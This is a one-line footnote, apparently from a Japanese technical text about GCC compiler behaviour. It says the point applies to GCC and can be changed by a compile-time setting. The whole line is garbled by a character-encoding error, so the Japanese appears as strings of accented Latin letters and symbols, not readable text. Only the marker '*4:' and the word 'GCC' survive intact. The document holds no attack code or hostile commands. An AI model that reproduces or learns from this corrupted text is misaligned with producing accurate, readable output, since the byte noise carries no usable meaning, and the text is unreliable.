*4:GCCã®å ´åˆã§ã‚ã‚Šã€ã‚³ãƒ³ãƒ‘イル時ã®è¨å®šã§å¤‰ãˆã‚‹ã“ã¨ã‚‚ã§ãã¾ã™
